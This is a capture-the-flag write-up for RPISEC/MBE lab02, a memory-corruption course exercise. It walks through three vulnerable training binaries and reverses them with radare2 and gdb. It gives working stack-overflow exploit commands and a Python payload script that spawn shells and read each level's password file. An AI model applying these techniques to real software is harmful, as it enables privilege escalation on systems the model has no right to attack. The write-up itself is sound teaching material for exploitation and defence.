RPISEC/MBE: writeup lab02 (Memory Corruption)

In the last writeup for RPISEC/MBE lab01 we used radare2 to reverse three different binaries in order to reveal a secret password or serial. In this writeup we continue with lab02 which broaches the issue of Memory Corruption.

As in the last lab, there are three levels, ranging from C to A:
–> lab2C
–> lab2B
–> lab2A


lab2C

We start by connecting to the first level of lab02 using the credentials lab2C with the password lab02start:

gameadmin@warzone:~$ sudo ssh lab2C@localhost
lab2C@localhost's password: (lab02start)
        ____________________.___  _____________________________                
        \______   \______   \   |/   _____/\_   _____/\_   ___ \               
         |       _/|     ___/   |\_____  \  |    __)_ /    \  \/               
         |    |   \|    |   |   |/        \ |        \\     \____              
         |____|_  /|____|   |___/_______  //_______  / \______  /              
                \/                      \/         \/         \/               
 __      __  _____ ____________________________    _______  ___________
/  \    /  \/  _  \\______   \____    /\_____  \   \      \ \_   _____/
\   \/\/   /  /_\  \|       _/ /     /  /   |   \  /   |   \ |    __)_ 
 \        /    |    \    |   \/     /_ /    |    \/    |    \|        \
  \__/\  /\____|__  /____|_  /_______ \\_______  /\____|__  /_______  /
       \/         \/       \/        \/        \/         \/        \/ 

        --------------------------------------------------------        

                       Challenges are in /levels                        
                   Passwords are in /home/lab*/.pass                    
            You can create files or work directories in /tmp            
                    
         -----------------[ contact@rpis.ec ]-----------------          

Last login: Fri Jan 19 10:51:22 2018 from localhost

In contrast to the last lab, where we only had the binary, in this lab we have access to the source code. The source code is also located in the levels directory /levels/lab02/:

lab2C@warzone:~$ cd /levels/lab02
lab2C@warzone:/levels/lab02$ ls -al
total 44
drwxr-xr-x  2 root    root  4096 Jun 21  2015 .
drwxr-xr-x 14 root    root  4096 Sep 28  2015 ..
-r-sr-x---  1 lab2end lab2A 7500 Jun 21  2015 lab2A
-r--------  1 lab2A   lab2A 1153 Jun 21  2015 lab2A.c
-r-sr-x---  1 lab2A   lab2B 7451 Jun 21  2015 lab2B
-r--------  1 lab2B   lab2B  474 Jun 21  2015 lab2B.c
-r-sr-x---  1 lab2B   lab2C 7428 Jun 21  2015 lab2C
-r--------  1 lab2C   lab2C  513 Jun 21  2015 lab2C.c

Let’s have a look:

lab2C@warzone:/levels/lab02$ cat lab2C.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * compiled with:
 * gcc -O0 -fno-stack-protector lab2C.c -o lab2C
 */

void shell()
{
	printf("You did it.\n");
	system("/bin/sh");
}

int main(int argc, char** argv)
{
	if(argc != 2)
	{
		printf("usage:\n%s string\n", argv[0]);
		return EXIT_FAILURE;
	}

	int set_me = 0;
	char buf[15];
	strcpy(buf, argv[1]);

	if(set_me == 0xdeadbeef)
	{
		shell();
	}
	else
	{
		printf("Not authenticated.\nset_me was %d\n", set_me);
	}

	return EXIT_SUCCESS;
}

The first thing we need to do is to spot the vulnerability within the source code. In this case there is a call to the function strcpy on line 26. As the man page warns, this function is prone to buffer overflows:

lab2C@warzone:/levels/lab02$ man strcpy
STRCPY(3)                                                               Linux Programmer's Manual                                                              STRCPY(3)

NAME
       strcpy, strncpy - copy a string

SYNOPSIS
       #include <string.h>

       char *strcpy(char *dest, const char *src);

       char *strncpy(char *dest, const char *src, size_t n);

DESCRIPTION
       The  strcpy()  function  copies  the string pointed to by src, including the terminating null byte ('\0'), to the buffer pointed to by dest.  The strings may not
       overlap, and the destination string dest must be large enough to receive the copy.  Beware of buffer overruns!  (See BUGS.)
...

As stated in the man page, the destination buffer must be large enough to receive the copy. Because the destination buffer buf is only 15 bytes long and the source string is the first argument to the program (argv[1]), we can simply pass a longer string, leading to a buffer overflow.

On line 28 set_me is compared to the value 0xdeadbeef. If the comparison succeeds the function shell is called kindly spawning a shell for us. Thus we need to use the buffer overflow vulnerability to overwrite the variable set_me with the value 0xdeadbeef.

As with all local variables, set_me and buf are placed on the stack. In the C source code set_me is declared first, so we assume that it is placed on the stack before buf. Because the stack grows downwards (towards lower addresses), set_me would then be located at a higher address than buf. The compiler is free to arrange locals differently, so this is only an assumption for now:

X +  0:  [    buf   ]  <-- declared second
X + 15:  [  set_me  ]  <-- declared first

Let’s take a quick look at the assembly to verify this assumption:

...
[0x080485b0]> pdf @ sym.main
╒ (fcn) sym.main 119
│          ; arg int arg_0_2      @ ebp+0x2
│          ; arg int arg_3        @ ebp+0xc
│          ; DATA XREF from 0x080485c7 (entry0)
│          ;-- main:
│          ;-- sym.main:
│          0x080486cd    55             push ebp
│          0x080486ce    89e5           mov ebp, esp
│          0x080486d0    83e4f0         and esp, 0xfffffff0
│          0x080486d3    83ec30         sub esp, 0x30
│          0x080486d6    837d0802       cmp dword [ebp + 8], 2          ; [0x2:4]=0x101464c
│      ┌─< 0x080486da    741c           je 0x80486f8
│      │   0x080486dc    8b450c         mov eax, dword [ebp + 0xc]      ; [0xc:4]=0
│      │   0x080486df    8b00           mov eax, dword [eax]
│      │   0x080486e1    89442404       mov dword [esp + 4], eax        ; [0x4:4]=0x10101
│      │   0x080486e5    c70424f48704.  mov dword [esp], str.usage:_n_s_string_n  ; [0x80487f4:4]=0x67617375  ; "usage:.%s string." @ 0x80487f4
│      │   0x080486ec    e85ffeffff     call sym.imp.printf             ; sub.printf_12_54c+0x4
│      │     ^- sub.printf_12_54c() ; sym.imp.printf
│      │   0x080486f1    b801000000     mov eax, 1
│     ┌──< 0x080486f6    eb4a           jmp 0x8048742
│     │└   ; JMP XREF from 0x080486da (sym.main)
│     │└─> 0x080486f8    c744242c0000.  mov dword [esp + 0x2c], 0       ; [0x2c:4]=0x280009  ; ','
│     │    0x08048700    8b450c         mov eax, dword [ebp + 0xc]      ; [0xc:4]=0
│     │    0x08048703    83c004         add eax, 4
│     │    0x08048706    8b00           mov eax, dword [eax]
│     │    0x08048708    89442404       mov dword [esp + 4], eax        ; [0x4:4]=0x10101
│     │    0x0804870c    8d44241d       lea eax, [esp + 0x1d]           ; 0x1d
│     │    0x08048710    890424         mov dword [esp], eax
│     │    0x08048713    e848feffff     call sym.imp.strcpy
...

On line 23 the local variable set_me, stored at esp+0x2c, is initialized with 0. Before the call to strcpy, the address of the second local variable buf (esp+0x1d) is loaded on line 28 and placed on the stack as the first argument. Between both locations there are exactly 0x2c - 0x1d = 44 - 29 = 15 bytes: the size of buf. As predicted, set_me is located directly after buf, meaning that we can overwrite set_me if we overflow buf.
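
The offset arithmetic can be double-checked with a few lines of Python. This is only a minimal sketch: the constant and variable names are made up for illustration, and only the two stack offsets are taken from the disassembly above.

```python
# Offsets relative to esp, taken from the disassembly of main
BUF_OFFSET = 0x1d      # lea eax, [esp + 0x1d]      -> buf
SET_ME_OFFSET = 0x2c   # mov dword [esp + 0x2c], 0  -> set_me

# Number of bytes we have to write before we reach set_me
padding = SET_ME_OFFSET - BUF_OFFSET
print(padding)  # 15
```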

Thus the only thing we need to do is call the program with the appropriate argument. This argument must consist of 15 arbitrary bytes plus the 4 bytes we want to write into set_me:

argument =  XXXXXXXXXXXXXXXYYYY
                 buf      set_me
              (15 byte)  (4 byte)

As we want to set set_me to the value 0xdeadbeef, we have to consider that integers are stored in little endian format on x86. In little endian the least significant byte is stored first, so the bytes appear in reverse order in memory:

integer =   0xdeadbeef
memory  :   ef be ad de
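
The byte order can also be produced with Python's struct module instead of being written out by hand. The following is a small sketch in Python 3 (the warzone VM itself ships Python 2); the names packed and payload are chosen here for illustration only.

```python
import struct

# "<I" = little-endian, unsigned 32-bit integer
packed = struct.pack("<I", 0xdeadbeef)
print(packed.hex())  # efbeadde

# 15 filler bytes for buf, followed by the new value of set_me
payload = b"A" * 15 + packed
print(len(payload))  # 19
```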

On the command line we can use python to create the appropriate string:

lab2C@warzone:/levels/lab02$ ./lab2C $(python -c 'print("A"*15+"\xef\xbe\xad\xde")')
You did it.
$ whoami
lab2B
$ cat /home/lab2B/.pass
1m_all_ab0ut_d4t_b33f

Done 🙂 The password for the next level is 1m_all_ab0ut_d4t_b33f.


lab2B

The credentials for the next level are lab2B with the password 1m_all_ab0ut_d4t_b33f:

gameadmin@warzone:~$ sudo ssh lab2B@localhost
lab2B@localhost's password: (1m_all_ab0ut_d4t_b33f)
        ____________________.___  _____________________________                
        \______   \______   \   |/   _____/\_   _____/\_   ___ \               
         |       _/|     ___/   |\_____  \  |    __)_ /    \  \/               
         |    |   \|    |   |   |/        \ |        \\     \____              
         |____|_  /|____|   |___/_______  //_______  / \______  /              
                \/                      \/         \/         \/               
 __      __  _____ ____________________________    _______  ___________
/  \    /  \/  _  \\______   \____    /\_____  \   \      \ \_   _____/
\   \/\/   /  /_\  \|       _/ /     /  /   |   \  /   |   \ |    __)_ 
 \        /    |    \    |   \/     /_ /    |    \/    |    \|        \
  \__/\  /\____|__  /____|_  /_______ \\_______  /\____|__  /_______  /
       \/         \/       \/        \/        \/         \/        \/ 

        --------------------------------------------------------        

                       Challenges are in /levels                        
                   Passwords are in /home/lab*/.pass                    
            You can create files or work directories in /tmp            
                    
         -----------------[ contact@rpis.ec ]-----------------          

Last login: Fri Jan 19 16:04:01 2018 from localhost

Again we have access to the source code:

lab2B@warzone:/levels/lab02$ cat lab2B.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * compiled with:
 * gcc -O0 -fno-stack-protector lab2B.c -o lab2B
 */

char* exec_string = "/bin/sh";

void shell(char* cmd)
{
	system(cmd);
}

void print_name(char* input)
{
	char buf[15];
	strcpy(buf, input);
	printf("Hello %s\n", buf);
}

int main(int argc, char** argv)
{
	if(argc != 2)
	{
		printf("usage:\n%s string\n", argv[0]);
		return EXIT_FAILURE;
	}

	print_name(argv[1]);

	return EXIT_SUCCESS;
}

Like in the previous level, there is a call to the function strcpy (line 20). As we have already seen in the last level, we can use this call to trigger a buffer overflow: the argument passed to the program (argv[1]) is handed to the function print_name, which in turn passes it to strcpy as the source string.

There is also a user-defined function called shell (lines 12-15), but it differs from the last one. This shell function does not directly spawn a shell, but rather takes one string argument, which is then passed to the function system. If we have a look at the rest of the source code, we notice that the function is never actually called. Thus we have to trigger it ourselves.

Above the shell function definition, on line 10, we can see that the author of the source code kindly declared a variable which points to the string we would like to pass to the shell function: "/bin/sh".

Summing it up we have to:
–> push the address of "/bin/sh" on the stack
–> call the user-defined function shell

In order to do this, the first thing we need to know is the address of the string "/bin/sh" as well as the address of the function shell. We can use r2 to do this:

[0x080485c0]> iz~bin
vaddr=0x080487d0 paddr=0x000007d0 ordinal=000 sz=8 len=7 section=.rodata type=a string=/bin/sh
[0x080485c0]> is~shell
vaddr=0x080486bd paddr=0x000006bd ord=070 fwd=NONE sz=19 bind=GLOBAL type=FUNC name=shell

The string "/bin/sh" is at 0x080487d0 and the function shell is at 0x080486bd.

Good for now. But how do we call the function shell? If we have a look at the source code again, we can see that strcpy is called within the user-defined function print_name. Let’s have a look at the assembly in main which calls the function print_name:

[0x080485c0]> pdf @ sym.main
...
│     │    0x08048730    890424         mov dword [esp], eax
│     │    0x08048733    e898ffffff     call sym.print_name
...

eax contains the address of the string argument passed to the program (argv[1]). This address is placed on the stack, and then the call instruction is used to execute the print_name function. After the function has been executed, the processor needs to know where to continue execution. Thus the address of the next instruction after the call has to be saved. This is what the call instruction does: it pushes the address of the next instruction on the stack and then jumps to the function’s address. When the function is entered, the stack looks like this:

esp+0x00:  [ return address ]  <-- return address pushed by call
esp+0x04:  [    argument    ]  <-- argument passed to function print_name

At the end of the function…

[0x080485c0]> pdf @ sym.print_name
...
╘          0x080486fc    c3             ret

… there is a ret instruction, which simply pops the top element of the stack (the return address formerly pushed by the call instruction) and then jumps to that address. This way the execution can proceed at the location right after the call.
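
The interplay of call and ret can be modelled in a few lines. This is a toy sketch, not how the CPU is implemented: the stack is a plain Python list, and the helper names call and ret are hypothetical. The two addresses are derived from the 5-byte call encoding e898ffffff shown above (0x08048733 + 5 for the return address, plus the relative displacement of -0x68 for the target).

```python
# Toy model of the stack: a Python list whose last element is the top.
stack = []

def call(return_address, target):
    """Model `call target`: push the return address, then jump to target."""
    stack.append(return_address)
    return target  # new value of eip

def ret():
    """Model `ret`: pop the top of the stack and jump to that address."""
    return stack.pop()  # new value of eip

# main places the argument on the stack, then executes the call at 0x08048733.
stack.append("pointer to argv[1]")
eip = call(return_address=0x08048738, target=0x080486d0)
print(hex(eip))   # 0x80486d0 (entry of print_name)

# ... the body of print_name would run here ...

eip = ret()
print(hex(eip))   # 0x8048738 (back in main, right after the call)
```

If the value on top of the stack is replaced before ret runs, the model returns to the replaced value instead, which is exactly what the overflow exploits.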

As we have already seen in the last level, we can use the buffer overflow vulnerability caused by the call to strcpy in order to overwrite elements on the stack. The buffer we can overflow (buf) is a local variable which is stored on the stack. Because the space for this local variable is reserved after the return address has been pushed, it is located before the return address in memory (at a lower address). That is why we can overwrite the return address.

Now we just need to know where the return address and the buffer are located on the stack in order to calculate how many bytes we need to write. A rather crude but effective way is to input a pattern long enough to overwrite the return address, let the program crash and then see which part of the pattern caused the crash. This can be done using gdb:

lab2B@warzone:/levels/lab02$ gdb lab2B
Reading symbols from lab2B...(no debugging symbols found)...done.
gdb-peda$ r AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
Starting program: /levels/lab02/lab2B AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
Hello AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x2f ('/')
EBX: 0xb7fcd000 --> 0x1a9da8 
ECX: 0x0 
EDX: 0xb7fce898 --> 0x0 
ESI: 0x0 
EDI: 0x0 
EBP: 0x47474746 ('FGGG')
ESP: 0xbffff6c0 ("HIIIIJJJJ")
EIP: 0x48484847 ('GHHH')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x48484847
[------------------------------------stack-------------------------------------]
0000| 0xbffff6c0 ("HIIIIJJJJ")
0004| 0xbffff6c4 ("IJJJJ")
0008| 0xbffff6c8 --> 0x804004a 
0012| 0xbffff6cc --> 0xb7fcd000 --> 0x1a9da8 
0016| 0xbffff6d0 --> 0x8048740 (<__libc_csu_init>:	push   ebp)
0020| 0xbffff6d4 --> 0x0 
0024| 0xbffff6d8 --> 0x0 
0028| 0xbffff6dc --> 0xb7e3ca83 (<__libc_start_main+243>:	mov    DWORD PTR [esp],eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV

On line 2 you can see that I provided the pattern AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ as argument to the program. On line 4 the program properly outputs the greeting-message right before receiving a SIGSEGV signal (Segmentation fault). A segmentation fault is raised when the program tries to access memory which is not accessible. On line 19 we can see that this was caused by the instruction pointer (eip) trying to access the address 0x48484847. As you may have noticed, this is a part of our pattern because 0x48484847 equals GHHH. Now we can calculate the offset:

pattern =  AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
                     27 byte          eip
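
The same offset can be computed instead of counted. A small sketch in Python 3, with variable names chosen for illustration: the crashed eip value is converted back into the four bytes as they were laid out in memory and then searched for in the pattern.

```python
import struct

pattern = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"
crashed_eip = 0x48484847   # EIP value reported by gdb

# The four bytes as they were stored in memory (little endian)
needle = struct.pack("<I", crashed_eip)
print(needle)              # b'GHHH'

# Number of bytes in front of the overwritten return address
offset = pattern.index(needle)
print(offset)              # 27
```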

Thus if we input the following string, we overwrite the return address and the code execution proceeds in the function shell:

python -c 'print("A"*27+"\xbd\x86\x04\x08")'

Side note: patterns and the offset within a pattern can easily be created / calculated using the Metasploit scripts pattern_create and pattern_offset.

There is still one thing missing. We need to provide the "/bin/sh" string to the shell function. But where to put it? Right after the address of the shell function? As the ret instruction at the end of the print_name function just pops our modified return address from the stack and directly jumps to that address, no ordinary call instruction is executed. As we have already seen the stack should look like this at the entry of a function:

esp+0x00:  [ return address ]  <-- return address pushed by call
esp+0x04:  [    argument    ]  <-- argument passed to function shell

This is not the return address from the print_name call but the return address for the shell function we are returning into. Because there is no call, we need to put this return address on the stack ourselves. As we do not really care where the execution proceeds after we got a shell, we can just put junk in here. A more elegant way would be to return into exit in order to gracefully shut down the program.

Summing this all up, the string argument we need to pass to the program looks like this:

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
XXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAXXXXBBBB

AAAA = address of function shell
BBBB = address of string "/bin/sh"
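
The layout can be assembled programmatically, which avoids typos in the byte order. This is a minimal sketch in Python 3; the constant names are made up for illustration, and the two addresses are the ones found with r2 above.

```python
import struct

SHELL_ADDR = 0x080486bd   # address of the function shell
BINSH_ADDR = 0x080487d0   # address of the string "/bin/sh"

payload = b"X" * 27                        # filler up to the return address
payload += struct.pack("<I", SHELL_ADDR)   # overwritten return address
payload += b"XXXX"                         # fake return address for shell (junk)
payload += struct.pack("<I", BINSH_ADDR)   # argument cmd of shell
print(len(payload))  # 39
```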

Now we can pass the final string to the program:

lab2B@warzone:/levels/lab02$ ./lab2B $(python -c 'print("X"*27 + "\xbd\x86\x04\x08" + "XXXX" + "\xd0\x87\x04\x08")')
Hello XXXXXXXXXXXXXXXXXXXXXXXXXXX...
$ whoami
lab2A
$ cat /home/lab2A/.pass
i_c4ll_wh4t_i_w4nt_n00b

Done 🙂 The password for the next level is i_c4ll_wh4t_i_w4nt_n00b.


lab2A

The credentials for the last level of this lab are lab2A with the password i_c4ll_wh4t_i_w4nt_n00b:

gameadmin@warzone:~$ sudo ssh lab2A@localhost
lab2A@localhost's password: (i_c4ll_wh4t_i_w4nt_n00b)
        ____________________.___  _____________________________                
        \______   \______   \   |/   _____/\_   _____/\_   ___ \               
         |       _/|     ___/   |\_____  \  |    __)_ /    \  \/               
         |    |   \|    |   |   |/        \ |        \\     \____              
         |____|_  /|____|   |___/_______  //_______  / \______  /              
                \/                      \/         \/         \/               
 __      __  _____ ____________________________    _______  ___________
/  \    /  \/  _  \\______   \____    /\_____  \   \      \ \_   _____/
\   \/\/   /  /_\  \|       _/ /     /  /   |   \  /   |   \ |    __)_ 
 \        /    |    \    |   \/     /_ /    |    \/    |    \|        \
  \__/\  /\____|__  /____|_  /_______ \\_______  /\____|__  /_______  /
       \/         \/       \/        \/        \/         \/        \/ 

        --------------------------------------------------------        

                       Challenges are in /levels                        
                   Passwords are in /home/lab*/.pass                    
            You can create files or work directories in /tmp            
                    
         -----------------[ contact@rpis.ec ]-----------------          

Last login: Fri Jan 19 16:10:00 2018 from localhost

We start by analyzing the provided source code:

lab2A@warzone:/levels/lab02$ cat lab2A.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * compiled with:
 * gcc -O0 -fno-stack-protector lab2A.c -o lab2A
 */

void shell()
{
        printf("You got it\n");
        system("/bin/sh");
}

void concatenate_first_chars()
{
        struct {
                char word_buf[12];
                int i;
                char* cat_pointer;
                char cat_buf[10];
        } locals;
        locals.cat_pointer = locals.cat_buf;

        printf("Input 10 words:\n");
        for(locals.i=0; locals.i!=10; locals.i++)
        {
                // Read from stdin
                if(fgets(locals.word_buf, 0x10, stdin) == 0 || locals.word_buf[0] == '\n')
                {
                        printf("Failed to read word\n");
                        return;
                }
                // Copy first char from word to next location in concatenated buffer
                *locals.cat_pointer = *locals.word_buf;
                locals.cat_pointer++;
        }

        // Even if something goes wrong, there's a null byte here
        //   preventing buffer overflows
        locals.cat_buf[10] = '\0';
        printf("Here are the first characters from the 10 words concatenated:\n\
%s\n", locals.cat_buf);
}

int main(int argc, char** argv)
{
        if(argc != 1)
        {
                printf("usage:\n%s\n", argv[0]);
                return EXIT_FAILURE;
        }

        concatenate_first_chars();

        printf("Not authenticated\n");
        return EXIT_SUCCESS;
}

What does the program do?
–> the main-function simply calls the function concatenate_first_chars (line 55)
–> in concatenate_first_chars a struct named locals is defined (line 18-23)
–> a prompt to input 10 words is displayed (line 26)
–> a for-loop initializes locals.i with 0 and keeps looping as long as locals.i does not equal 10 (line 27)
–> locals.i is incremented by one every loop-step (line 27)
–> within the loop-body fgets reads at most 0x10 - 1 = 15 characters from stdin into locals.word_buf and appends a terminating null byte, i.e. it writes up to 16 bytes (line 30)
–> the first read character from locals.word_buf is copied to locals.cat_buf by using the pointer locals.cat_pointer (line 36)
–> locals.cat_pointer is incremented by 1 in order to point to the next character within locals.cat_buf on the next loop-iteration (line 37)
–> after the loop the 11th entry of locals.cat_buf is set to 0 (which is actually an overflow because locals.cat_buf is only 10 bytes long) (line 42)
–> the concatenated string locals.cat_buf is printed (line 43-44)

Like in the first level there is a function named shell, which does not take any arguments and spawns a shell (lines 10-14). Thus our goal is to call this function. As we have already seen in the second level of this lab, this can be achieved by overwriting the return address within a function call if there is a vulnerability we can exploit.

As you may have noticed, on line 30 fgets is told to write up to 0x10 = 16 bytes into locals.word_buf (at most 15 characters plus the terminating null byte). If we have a look at the struct declaration on line 19, we can see that locals.word_buf is only 12 bytes long. Thus we can overflow locals.word_buf by up to 4 bytes. These 4 bytes are written into the variable following locals.word_buf, which is locals.i: the loop index! This way we can control how many iterations the loop performs.

Within the loop-body locals.cat_pointer is incremented on each iteration without any further checking. If the loop iterates more than 10 times, the memory following locals.cat_buf is overwritten. As we have seen in the second level of this lab, this memory contains the return address, which has been pushed by the last call instruction (in this case call concatenate_first_chars).

Summing it up we have to:

  1. determine the input to overwrite locals.i so that the loop iterates enough times to make locals.cat_pointer point to the return address
  2. get the address of the function we want to call (shell)
  3. determine the location of the return address on the stack
  4. construct the final input to the program

1. overwrite loop-index locals.i

Because we want to overwrite the stack by using the locals.cat_pointer which is incremented within the loop-body, we need to manipulate the loop-index in order to make more than 10 iterations. As the loop-index i is located directly after the buffer which we can overflow (word_buf), it suffices to input 12 arbitrary characters. Because the input is read using fgets the newline (0xa) entered to end the input is also put into the destination string. Thus the memory looks like this if we write 12 characters:

[--------------word_buf-----------] [----i----]
X  X  X  X  X  X  X  X  X  X  X  X  \n
58 58 58 58 58 58 58 58 58 58 58 58 0a 00 00 00

The integer value of i is stored in little endian, so the first byte is the least significant byte. The terminating null byte written by fgets lands in the second byte of i, and the remaining two bytes are still zero from the loop initialization, so the value of i is just 0xa = 10. This value is incremented by one and then compared to 10. This way the loop keeps iterating (i = 11, 12, 13, …). In order to exit the loop we can enter an empty line: if locals.word_buf[0] is equal to '\n', the function returns (line 30).
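
The effect of the overflow on the loop index can be reproduced with a small memory model. This is a sketch in Python 3 under simplifying assumptions: a 16-byte bytearray stands in for word_buf followed by i, and the fgets behaviour (at most 15 characters plus a terminating null byte) is imitated by hand. All names are hypothetical.

```python
import struct

# word_buf (12 bytes) directly followed by i (4 bytes); i starts at 0
memory = bytearray(16)

line = b"X" * 12 + b"\n"

# fgets(word_buf, 0x10, stdin) stores at most 15 characters plus '\0'
data = line[:15] + b"\x00"
memory[0:len(data)] = data

# Read i back as a little-endian 32-bit integer at offset 12
(i_after_fgets,) = struct.unpack_from("<i", memory, 12)
print(i_after_fgets)        # 10

# The loop increment runs before the comparison with 10
i_after_increment = i_after_fgets + 1
print(i_after_increment)    # 11
```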

2. address of function shell

This is quite easy as we already did it in the last levels using radare2:

lab2A@warzone:/levels/lab02$ r2 lab2A
 -- In Soviet Russia, radare2 have documentation.
[0x08048600]> aaa
[0x08048600]> is~shell
vaddr=0x080486fd paddr=0x000006fd ord=071 fwd=NONE sz=32 bind=GLOBAL type=FUNC name=shell

The function shell is located at 0x080486fd.

3. location of return address

This is a little bit more complicated. We could modify the loop-index, overwrite the stack with a pattern and then see which part of the pattern causes a segmentation fault like we did in the second level. This time we want to calculate the offset statically for learning purposes. All we need to do is have a look at the concatenate_first_chars function using r2:

[0x08048600]> pdf @ sym.concatenate_first_chars 
╒ (fcn) sym.concatenate_first_chars 153
│          ; var int local_2_2    @ ebp-0xa
│          ; var int local_6      @ ebp-0x18
│          ; var int local_7      @ ebp-0x1c
│          ; var int local_10     @ ebp-0x28
│          ; CALL XREF from 0x080487e1 (sym.main)
│          ;-- sym.concatenate_first_chars:
│          0x0804871d    55             push ebp
│          0x0804871e    89e5           mov ebp, esp
│          0x08048720    83ec38         sub esp, 0x38
│          0x08048723    8d45d8         lea eax, [ebp-local_10]
│          0x08048726    83c014         add eax, 0x14
│          0x08048729    8945e8         mov dword [ebp-local_6], eax
│          0x0804872c    c70424a38804.  mov dword [esp], str.Input_10_words:  ; [0x80488a3:4]=0x75706e49  ; "Input 10 words:" @ 0x80488a3
│          0x08048733    e888feffff     call sym.imp.puts
...

What does the stack look like? When the function is called, the call instruction stores the return address we want to overwrite on top of the stack:

esp     :  [   return address   ]  <-- pushed by call instruction

In the function prologue ebp is pushed on the stack (line 9):

esp     :  [      saved ebp     ]  <-- pushed in function prologue
esp+0x04:  [   return address   ]  <-- pushed by call instruction

On line 10 ebp is set to the value of esp since local variables are referenced with ebp:

ebp     :  [      saved ebp     ]  <-- pushed in function prologue
ebp+0x04:  [   return address   ]  <-- pushed by call instruction

To calculate the offset to the return address we need to know where the struct is located on the stack. On line 12 we can see that eax is loaded with the address ebp-local_10 (this is ebp-0x28 as you can see at the top of the r2 output on line 6). On line 13 0x14 is added to this address. The result is stored at ebp-local_6 (ebp-0x18). This corresponds to line 24 of the original source code, where locals.cat_pointer is set to the address of locals.cat_buf. Thus we already have two offsets of the struct: locals.cat_pointer is located at ebp-0x18 and locals.cat_buf is located at ebp-0x28 + 0x14 = ebp-0x14. Now we can add the other struct members and outline the stack:

ebp-0x28:  [   locals.word_buf  ]
ebp-0x1c:  [       locals.i     ]
ebp-0x18:  [ locals.cat_pointer ]
ebp-0x14:  [   locals.cat_buf   ]
ebp-0x0a:            ...
ebp     :  [      saved ebp     ]  <-- pushed in function prologue
ebp+0x04:  [   return address   ]  <-- pushed by call instruction

In order to overwrite the return address we have to write 10 + 10 + 4 = 24 bytes to locals.cat_buf. The first 10 bytes fill the array locals.cat_buf. The next 10 bytes fill the space between ebp-0x0a and ebp. The last 4 bytes overwrite the saved ebp. After that the next 4 bytes we write will overwrite the return address.
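
The numbers follow directly from the ebp-relative offsets in the stack outline. A short sketch that redoes the arithmetic (the constant names are made up for illustration):

```python
# Offsets relative to ebp, taken from the stack outline above
CAT_BUF = -0x14          # start of locals.cat_buf
CAT_BUF_SIZE = 10
SAVED_EBP = 0x00
RETURN_ADDRESS = 0x04

# Unused space between the end of cat_buf and the saved ebp
gap = SAVED_EBP - (CAT_BUF + CAT_BUF_SIZE)

# Bytes to write into cat_buf before the return address is reached
filler = RETURN_ADDRESS - CAT_BUF
print(gap, filler)  # 10 24
```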

4. final input

Now we have all information we need to construct the final input to the program in order to get our shell. I wrote a little python script to create the input, which we can later redirect to the program:

# overwrite locals.i
print("X"*12)

# fill locals.cat_buf and gap to ebp+0x04
for i in range(23):
  print("X")

# overwrite return address
print("\xfd")
print("\x86")
print("\x04")
print("\x08")

# input empty line to exit loop
print("")

On line 2 locals.i is overwritten with the ending newline (0xa) which makes the loop read more than the originally intended 10 words. Notice that this only puts one byte into locals.cat_buf because only the first char is moved there. The next 23 bytes are filled with an X (lines 5-6). At last the return address is overwritten with the address of the function shell.
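
The script above relies on Python 2, where print emits raw bytes such as \xfd unchanged. On Python 3 the same input would have to be built as bytes. The following is a hedged sketch of such a variant; the function name build_input is hypothetical and it is not the script used in this writeup.

```python
import struct

SHELL_ADDR = 0x080486fd   # address of the function shell, from the r2 output

def build_input():
    """Return the bytes to feed to lab2A on stdin, one word per line."""
    lines = [b"X" * 12]            # the trailing newline lands in locals.i
    lines += [b"X"] * 23           # remaining filler up to the return address
    # One address byte per line, since only the first char of a word is copied
    lines += [bytes([b]) for b in struct.pack("<I", SHELL_ADDR)]
    lines.append(b"")              # empty line makes the function return
    return b"\n".join(lines) + b"\n"

payload = build_input()
print(len(payload))  # 68
```

To produce a file like /tmp/out from this, the bytes could be written with sys.stdout.buffer.write(payload) or to a file opened in "wb" mode. Note that this one-byte-per-line approach only works as long as no address byte is 0x0a, because a word starting with a newline ends the loop early.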

Now we can store the python output in a file…

lab2A@warzone:/levels/lab02$ python /tmp/lab2A.py > /tmp/out

… and pipe that input to the program. One thing to notice here is that we cannot just simply do this:

lab2A@warzone:/levels/lab02$ cat /tmp/out| ./lab2A
Input 10 words:
Failed to read word
You got it
Segmentation fault
lab2A@warzone:/levels/lab02$

The message You got it is printed, which means that the function shell has been called successfully and a shell has been spawned. However, because stdin is only connected to the output of cat, the shell immediately reads end-of-file and exits, so we cannot interact with it. Afterwards shell returns to a junk address, which raises the segmentation fault. We can keep stdin open by adding a second cat command, which forwards our keyboard input to the program once /tmp/out has been sent:

lab2A@warzone:/levels/lab02$ python /tmp/lab2A.py > /tmp/out
lab2A@warzone:/levels/lab02$ (cat /tmp/out; cat) | ./lab2A
Input 10 words:
Failed to read word
You got it

Now we can interact with the shell as usual:

whoami
lab2end
cat /home/lab2end/.pass
D1d_y0u_enj0y_y0ur_cats?

Done 🙂 The final password is D1d_y0u_enj0y_y0ur_cats? (including the question mark).